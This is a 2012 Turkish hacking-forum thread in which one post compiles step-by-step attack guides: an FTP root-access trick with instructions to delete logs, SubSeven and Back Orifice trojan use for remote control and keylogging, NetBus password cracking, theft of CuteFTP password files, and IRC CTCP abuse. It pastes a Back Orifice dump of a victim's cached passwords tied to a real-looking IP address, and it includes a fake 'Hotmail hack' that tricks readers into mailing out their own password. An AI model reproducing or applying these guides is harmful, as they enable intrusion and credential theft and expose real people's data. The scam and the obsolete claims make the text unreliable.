Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Web & Server Güvenliği

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.






Server hack...!

Web & Server Güvenliği

Yeni Konu aç Cevapla
 
Seçenekler
Alt 08-07-2012 22:43   #1
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
07/2012
Mesajlar
Konular

Teşekkür (Etti): 44
Teşekkür (Aldı): 29


Cool Server hack...!



SERVER HACK…

Internete baglandiktan sonra hemen dos komut istemine'e cikin...

Kurban yerine hackliyceginiz server'i yazin adamin serverini filan bulmak icin internic.com a gidin search yapin sayfanin en altinda yazar..

ftp kurban.com

server username sorcak entera basip gecin
server password sorcak entera basip bunuda gecin
ve sunu yazin
quote user ftp
sonra bunu
quote cwd ~root
son olarakta bunu
quote pass ftp

Sonra mutlaka log file ini silin cunku sizin girdiginizi anlayabilirler..
Password dosyasi su dizinin icinde " /etc/passwd "
Eger yukardakileri yaptiysaniz ve server biraz eskiyse root passwordunu alabilirsiniz, bilmeyenler icin soleyelim root password en
yuksek seviyedeki passdir onunla herseyi yapabilirsiniz..

Not: Bu yontem yeni serverlarda calismiyor. Universitelerde filan calisiyor..

LINUX SERVER HACK…

Internete baglandiktan sonra hemen dos komut istemine'e cikin...

Kurban yerine hackliyceginiz server'i yazin adamin serverini filan bulmak icin
internic.com a gidin search yapin sayfanin en altinda yazar.. ftp kurban.com
server username sorcak entera basip gecin server password sorcak entera basip
bunuda gecin ve sunu yazin quote user ftp sonra bunu quote cwd ~root son
olarakta bunu quote pass ftp Sonra mutlaka log file ini silin cunku sizin girdiginizi
anlayabilirler.. Password dosyasi su dizinin icinde " /etc/passwd " Eger
yukardakileri yaptiysaniz ve server biraz eskiyse root passwordunu alabilirsiniz,
bilmeyenler icin soleyelim root password en yuksek seviyedeki passdir onunla
herseyi yapabilirsiniz.. Not: Bu yontem yeni serverlarda calismiyor. Universitelerde
filan calisiyor..

SUBSEVEN NEDIR.NASIL KULLANILIR….

SubSeven'i uzaktan yonetim icin veya hacking programi olarak kullanabilirsiniz. Zip dosyasinin icinde iki tane program var bi tanesi server.exe bunu kurbanin bilgisayarinda calistirmalisiniz netbustan filan girip upload edebilirisiniz. Sebseven.exe ise esas program her seyi bu program sayesinde yapacaksiniz...

Nasil Çalisiyor:
Kullanimi basit bi trojan. Kurban bilgisayarda server.exeyi calistiriyorsunuz, gostermelik bi hata mesaji belirecek [soyle: error loading system resources]. bundan sonra program kendini otomatik hardiske kuracak, ve windows her acildiginda oda acilacak. SubSeven.exe anaprogram netbus gibi bi sey her seyi bundan yapacaksiniz.

Özellikler:
+ Adama mesaj yollarsiniz, ve cevap verebilir

+ Browseri acip istediginiz siteye yonlendirirsiniz

+ Start butonunu saklar

+ Kullanicinin dektop goruntusunu alabilirsiniz..

+ Keyboard tuslari calismaz

+ Kurban'la chat yapabilirsiniz. Icq chat gibi bir programi var her zaman ustte olucak yani hic bi zaman kucultemez. Chatlesirken bi kac numara yapabilirsiniz. .Kurbanin yazdigi yer kaybolur sadece sizin yazdiklarinizi gorur kendisi yazamaz. Chat'ide kapatamaz ancak bilgisayari kapamak zorunda kalir..

+ Pc Speaker'i acip kapar.

+ Windowsu yeniden baslatir.

+ CD-ROM'u acip kapar

+ Mouse trail'i ekleyebilirsiniz.[Hani su mouse'un arkasindan gelen bi ok daha varya o iste]

+ Server'a sifre koyabilirsiniz.

+ Acik olan pencerelrin listesini alabilirsiniz:

- Istediginiz pencereyi kapayabilirsiniz

- enable/disable yapabilirsiniz.Kurban pencereyi acamaz

- Pencereyi kapama tusunu iptal edebilirsiniz

+ Kurbanin bilgisyarindaki butun suruculerin listesini verir.

+ Monitoru acip/kapar.

+ Gorev cubugunu saklar.

+ Kullanicinin bilgisayari hakkinda daha detayli bilgi alabilirsiniz.Windows version,

kullanici adi, sirket adi, ekran cozunurlugu gibin..

+ Server'in ismini deistirebilirsiniz

+ listen for all the pressed keys. you'll see all the keys pressed by the

victim. useful to get passwords.

+ Ses kaydeder. Kac saniyelik ses kaydi istiyorsaniz yaziyorsunuz. Ve kayit bittiginde

server size yolluyor. Tabii kullanicinin mikrofonu varsa..

+ Dosya Yoneticisi.Kurbanin bilgisyarindaki butun dosyalari gorebilirsiniz. Bi klasore iki

kere tikladiginizda istediginizi yapabilirsiniz:

- dosyanin boyutunu gorebilirsiniz

- dosya download edebilirsiniz

- Bmp veya Jpg dosyasi ise wallpaper yapabilirsiniz.

- dosya silebilirsiniz

- Wav dosyalarini calabilirsiniz

- Istediginiz programi/trojani kullanicinin bilgisayarinda calistirabilirsiniz.

+ Mouse tuslarinin yerlerini degistirir..Sola bastiginda sag sag bastiginda sol tusun

gorevini yapar..

+ Kurban online olunca haber verir. Bunu E-mail serveri kullanarak yapabilirsiniz, icqdan

kurban her online oldugunda size ip numarasini belirten bir mesaj gelir.

+ Server'i kapar.Fakat kullanici bilgisayari bi daha actiginda server yeniden acilir..

NETBUS SIFRELERINI KIRMAK....

1. Yöntem : Sitemden indirmis oldugunuz Netbushacker adli program ile bunu yapmak çok kolay ustdeki bolume
kisinin ip numunu yaziyoruz sonra set ip diyoruz altdaki "change pass" bolumunun silikligi gidene kadar bekliyoruz sonra assagi tarafa yeni sifreyi yazip giriyoruz.

2.)Yöntem Telnetle:

Telnet her windowsta var..Bul dan telnet'i bulup calistirin.
Baglana gelip uzaktaki sistem'e tiklayin
Ana bilgisyar adi: wingatede buldugmuz ipyi yazin
Baglanti Noktasi kismina ise 12345 yazin ve baglan in.

Sifreyi .ALMAK için
Password;1;123 ServerPwd;phiberoptik
Yapistirin.Sonra bir daha netbus'la girmeye çalisiyoruz sordugu sifreye dephiberoptik yaziyoruz
CUTE FTP KULLANICILARIN SIFFELERINI ÇALMAK....

Birisinin web sitesini hacklemek istiyorsunuz.. (TABI VARSA) bu gibi konularda en önemli olay mantiktir.. Bu hack olayi için karsi tarafin BOSERVE yada PATCH gibi yem programciklarini çalistirmasi gerekir.. Bunu yaptigini farzedelim! Her FTP programinin sifreleri kaydettigi bir DATA dosyasi vardir. Genelde ençok kullanilan CUTEFTP dir. Bu ftp programi kaydedilen sifreleri, SMDATA.DAT dosyasinda sakliyor.. Karsidaki kurbanin SMDATA.DAT dosyasini aliniz.. Bunuda su yolu takip ederek bulabilirsiniz.. Genelde : /PROGRA~1/CUTEFTP/SMDATA.DAT dir. Bu dosyayi kendi cuteftp nizin oldugu yere kopyalayin.. fakat bundan önce kendinizinkini yedekleyinki sizin sifreler silinmesin.. Daha sonra bu dosyadan sifreleri alin..

BILGISAYARA GIRME....
Telnet her windowsta vardir...Bul (find) dan telnet'i buldurup calistirin... Baglana gelip uzaktaki sistem'e tiklayin... Ana bilgisyar adi: wingatede buldugumuz ip'i yaziyoruz. Baglanti Noktasi kismina ise netbus portu olan 12345 yaziyoruz..baglana tikliyoruz.. yukarda netbus 1.6 veya 1.7 yazar.. Simdi sifreyi kirmak için Password;1;123 ServerPwd;onurbu yaziyi paste'liyoruz...ve sifre ufuk oluyor,siz sifreyi ufuk yerine baska bir seylerde yapabilirsiniz..
Sonra bir daha netbus'a gidiyoruz artik sifre ufuk giriyoruz...Artik adamin bilgisayarindayyz..file manager'a gelerek adama boserve.exe yi yolluyoruz...nereye yolliycagimizi soruyor.. c:\windows yazarak windowsun altina atiyoruz. yolladiktan sonra download ewkranini kapiyoruz.. start program diyoruz...c:\windows\boserve.exe diyoruz..tamam netbustaki isimizde bitti..
Simdi Back Orifice'ye geçiyoruz.target hostorta adamin ipsini yaziyoruz..yan tarafada 12345 yan taraftan system passwordsu seçip send e basiyoruz ve bingoooo bu adimda 10un ustunde password varmis.. Bo da dah cok sey yapabilirsiniz ama onlarida sonra anlatirimmm.. bu arada adamdan cikan passler..
** 0:Ping host packet sent (19 bytes) val1: '' val2: ''
---------- Packet received from host 194.242.78.148 port 31337 ---------
!PONG!1.20!WINDOWS!
------------------------- End of Data -------------------
** 1:System passwords packet sent (19 bytes) val1: '' val2: ''
---------- Packet received from host 194.242.78.148 port 31337 ---------
Password cached by system:
index:02(06) len:34(20/52)
Resource: 'crypt_Blizzard_Storm' Password: '›óå‘P'
index:09(19) len:52(41/22)
Resource: 'www.schoolgirls.com/restricted directory' Password: ':'
index:13(19) len:50(31/102)
Resource: 'www.sexxxfarm.com/members only' Password: 'burp:burp'
index:25(01) len:28(07/122)
Resource: 'WINDOWS' Password: 'PAKSOYKAROLAû'
index:00(06) len:74(53/122)
Resource: '*Rna\AT&T WorldNet Service\100000000@worldnet.att.net' Password: 'aaaaaaaaaaaa'
index:04(06) len:68(50/92)
Resource: '*Rna\Microsoft Internet Referral Service\icwsignup' Password: 'icwsignup9,'
index:07(06) len:44(27/82)
Resource: '*Rna\Turk Nokta Net\abaygan' Password: 'need-bob'
index:08(06) len:38(25/52)
Resource: '*Rna\Turk Nokta Net\burak' Password: 'burak'
index:10(06) len:22(14/02)
Resource: '*Rna\sol\amnyk' Password: '*'
index:05(06) len:42(27/72)
Resource: '*Rna\Turk Nokta Net\necatit' Password: 'eynesil"'
index:11(06) len:34(19/62)
Resource: '*Rna\Alnet\ersinari' Password: '987199$'
index:15(06) len:36(21/62)
Resource: '*Rna\Burak\rbayraktar' Password: '963963'
index:16(06) len:42(27/62)
Resource: '*Rna\Ba?lantym 5\rbayraktar' Password: '963963.$'
index:17(06) len:36(19/82)
Resource: '*Rna\Burak\r1056700' Password: 'DABmvsVG·('
index:18(06) len:40(19/122)
Resource: '*Rna\Burak\doganalp' Password: 'alpdogan<BR>ß'
index:19(06) len:18(10/02)
Resource: '*Rna\nolur' Password: '$'
index:20(06) len:36(19/82)
Resource: '*Rna\Burak\b1000025' Password: 'ncVCjYFu¬ '
index:06(06) len:32(16/82)
Resource: '*Rna\AYDATA\suen' Password: '68913672$'
index:22(06) len:36(22/62)
Resource: '*Rna\Ba?lantym 4\merko' Password: 'merko7.'
index:21(06) len:46(25/122)
Resource: '*Rna\Ba?lantym 7\ baycenk' Password: 'gizlikorkunc'
index:23(06) len:28(19/12)
Resource: '*Rna\bayrak\baycenk' Password: ' '
index:14(06) len:30(16/52)
Resource: '*Rna\Burak\burak' Password: 'burakì'
index:12(06) len:30(16/62)
Resource: '*Rna\Alnet\merko' Password: 'merko7&'
index:24(06) len:38(17/122)
Resource: '*Rna\cenk\baycenk' Password: 'paksoykarolaa'
index:01(04) len:18(05/52)
Resource: 'MAPI' Password: 'MAPI'
index:03(19) len:14(04/12)
Resource: 'NNTP' Password: ':'
End of cached passwords.
Unable to read value 'ScreenSave_Data'

HOTMAIL HACK....

1-Önce hotmailden bir hesap alin veya hesabiniz varsa
almana gerek yok.
2-Hotmail mailine girin.
3-Yeni bir mail yarat
4-Mailin Subject bölümüne "retrieve password" yaz
5-Gidecek adres
bölümüne:"mspport_recovery_bot@hotmail.com" yazi
6-Mesaj bölümüne asagidakileri yaz:
ARKADASININ LOGIN ADI(örnegin mail adresi sonkurban@hotmail.com ise sonkurban yaz..) /cgi-bin/start/v7.03/method=getassmachine+SENINHOTMAILSIFREN{M27568&j ava-&rsa
Bu maili gönderdikten sonra sana "from:system subject:system reg message" baslikli mail gelecek ve bu mailde o kisinin hotmail sifresi olcak

SCRIPT YÖNETMEK ...

Dragon ve Solucan Script Kullanicilarini yönetmek.Yukarda ismi yazili scriptleri kullanan masumca chatini yapan kisilere irc yi zindan etmek artik çok basit.CTCP özelliklerini kullanarak en basiti kurbanin nickini degistirmekten baslayan ve her türlü mirc
komutunu kullanmanizi saglayan komutlari açikliyorum.
Nick Degistirme /ctcp nick LAGG /nick yeni nick
Kanala Sokma /ctcp nikc LAGG /join #kanal
Kanala yazi yazdirma /ctcp nick LAGG /msg #kanal mesaj
Kurbani ircden çikarma /ctcp nick LAGG /quit (mesaj istenirse)
Kurbanin mIRC ini kapama /ctcp nick LAGG /exit
Sizinde gördügünüz gibi aslinda olay sadece /ctcp nick
LAGG den sonra yazdiginiz komutlarin kurban tarafindan
uygulanmasindan baska birsey degildir.

SERVER-COKERTME....
Internete baglandiktan sonra hemen dos komut istemine'e cikin...
Kurban yerine hackliyceginiz server'i yazin adamin serverini filan bulmak icin internic.com a gidin search yapin sayfanin en altinda yazar..
ftp kurban.com
server username sorcak entera basip gecin
server password sorcak entera basip bunuda gecin
ve sunu yazin
quote user ftp
sonra bunu
quote cwd ~root
son olarakta bunu
quote pass ftp
Sonra mutlaka log file ini silin cunku sizin girdiginizi anlayabilirler..
Password dosyasi su dizinin icinde " /etc/passwd "
Eger yukardakileri yaptiysaniz ve server biraz eskiyse root passwordunu alabilirsiniz, bilmeyenler icin soleyelim root password en yuksek seviyedeki passdir onunla herseyi yapabilirsiniz..
Not: Bu yontem yeni serverlarda calismiyor. Universitelerde filan calisiyor..

NOT: Yukaridaki Bilgiler Egitim Amaçlidir.



___________________________________________

TURK HACK TEAM

 Offline  
 
Alıntı ile Cevapla
Teşekkür

ONE OKTAY Teşekkür etti.
Alt 08-07-2012 22:45   #2
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
07/2012
Nereden
Diyarbakır
Mesajlar
Konular

Teşekkür (Etti): 7
Teşekkür (Aldı): 22




Güzel paylaşım



___________________________________________

Death Note ByKira
[YOUTUBE]http://www.youtube.com/watch?v=E3LeZNlI0Xg[/YOUTUBE]

 Offline  
 
Alıntı ile Cevapla
Alt 08-07-2012 22:45   #3
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
07/2012
Nereden
Diyarbakır
Mesajlar
Konular

Teşekkür (Etti): 7
Teşekkür (Aldı): 22




AmA YAZI BÜYÜK sanırım forum kurallarına göre uygun degil



___________________________________________

Death Note ByKira
[YOUTUBE]http://www.youtube.com/watch?v=E3LeZNlI0Xg[/YOUTUBE]

 Offline  
 
Alıntı ile Cevapla
Alt 08-07-2012 22:47   #4
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
07/2012
Mesajlar
Konular

Teşekkür (Etti): 44
Teşekkür (Aldı): 29




Rahat okumanız amaçlı büyük yazdım yoksa okadar yazı küçük okunmaz sizin iyliğiniz düşnüyorum



___________________________________________

TURK HACK TEAM

 Offline  
 
Alıntı ile Cevapla
Alt 08-07-2012 22:49   #5
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
07/2012
Nereden
Diyarbakır
Mesajlar
Konular

Teşekkür (Etti): 7
Teşekkür (Aldı): 22




Yok yani forumde bir ara okudum belli bir büyüklügü geçince silierler konuyu



___________________________________________

Death Note ByKira
[YOUTUBE]http://www.youtube.com/watch?v=E3LeZNlI0Xg[/YOUTUBE]

 Offline  
 
Alıntı ile Cevapla
Alt 08-07-2012 22:51   #6
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
07/2012
Mesajlar
Konular

Teşekkür (Etti): 44
Teşekkür (Aldı): 29




Emeğe saygı amaçlı teşekkür verirsen sevinirm



___________________________________________

TURK HACK TEAM

 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
Siber Güvenlik
sosyal medya bayilik paneli
instagram takipci hilesi

wau